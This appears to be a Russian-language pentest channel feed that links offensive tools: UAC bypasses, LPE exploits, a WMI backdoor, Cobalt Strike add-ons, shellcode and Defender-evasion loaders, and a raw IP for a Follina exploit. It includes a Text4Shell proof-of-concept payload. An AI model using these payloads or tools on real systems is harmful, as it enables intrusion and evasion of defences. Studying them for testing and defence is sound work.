Обходим UAC и вваливаемся в system32
exploit
video

#windows #UAC #system32

Я просто оставлю это здесь
WMEye

#windows #WMI #shell #backdoor

LockBit и 1000$
Ну как и ожидалось, вся эта тема с татухами хорошего не сулила.
LockBit-Tattoo
А теперь смотрим информацию о владельце репозитория и ....ясно понятно

#98%

BurpSuite: на удаленке (командная работа)
BurpSuite-Team-Extension
Теперь пентестить ВЕБ можно всей командой, оперативно обмениваться инфой в реалТайме
*
Имеется (Mutual TLS Encryption of all traffic between client and server)

#burp #team

CVE-2022-42889
Apache - Commons Text library
CVSS: 9.8 CRITICAL
Почитать про дырку тут

POC
Java:

StringSubstitutor.createInterpolator().replace("${noscript:js:new java.lang.ProcessBuilder(\"calc\").start()}");

#apache

CobaltStrike <= 4.7.1 RCE
пора бы обновляться до 4.7.2 (как раз недавно вышла)
CVE-2022-39197 RCE POC

CVE-2022-3368
Дырка в произвольном перемещении файлов в компоненте обновления программного обеспечения Avira Security.
В общем LPE и systm32
download

#lpe #avira #windows

CVE-2022-27502
RealVNC server up to 6.9.0 DLL Hijacking Exploit

#exploit #realVNC

Наконец то нормальные релизы !
Windows95
Да да, она самая, только чуть чуть javaScript есть)

#old #windows

Shellcode Template
Легко модифицируемые шеллкод-шаблоны под Windows x64/x86
Download

#windows #shellcode

CVE-2022-42889
Почитать про дырку тут
Сканер дырки на питоне text4shell-tools
Сканер дырки для BurpSuite burp-text4shell
Поиграться с дыркой в докере text4shell-docker
Сам POC

#apache #exploit #poc

FUD-UUID-Shellcode
Еще одна техника внедрения шелл-кода с использованием C++, которая пытается обойти Windows defender, используя колдовство шифрования XOR и безумие строк UUID :)

Нервы и мат не помогут, но облегчат страдания.
DownLoad

#shellcode #windows #xor #uuid

SQLBOX Ultimate Injection Tool v1.1.0

#sql

Folina
httpXXX://18.181.220.197:9001/

Только для исследователей 😊
#folina #exploit #docx

Тренды в мире webshell_ов (2022)
Ну кстати хороший доклад, рекомендую глянуть

#webshell

Кто поможет vx-underground ? Чутка места не хватает у ребят

1,245,000,000 malware samples

#underground #malware

Поговорим о C&C (С2)
Многие часто спрашивают, какой C2 выбрать, может CobaltStrike или Metasploit, а может даже Sliver ?
*
Для начала читаем статью - Что такое Command and Control?
*
И смотрим сравнительную таблицу C&C (С2) , таблица хоть и далеко не полная, но из нее хорошо видно:
1. на каком ЯП C2 написан
2. какие каналы связи используют агенты
3. что предлагает саппорт
4. ссылки на ГИТы и твиттеры разрабов
5. API and MultiUsering
и тд.
*
Начитавшись - переходим к практике, ставим VM\docker\vagrant или прости господи на 127.0.0.1 и начинаем тестить.
Удачного вкатывания ! 😜

#c&c #c2

Подборка ресурсов о PenTesting и Bug Bounty Hunting
4 утра блин, спать !
#learn #pentest

JuicyPotatoNG
Windows LPE: от сервисной учётки до system
Read
Download LPE

#lpe #windows

Pentest BOOK
Есть интересные примеры
Read

#learn

Пора вводить рубрику "В мире Кобальта"
*

ScreenshotBOF

Альтернативная возможность делать снимки экрана для Cobalt Strike, которая использует WinAPI и не выполняет fork & run.
Пойти, скачать, установить - туть

#cobalt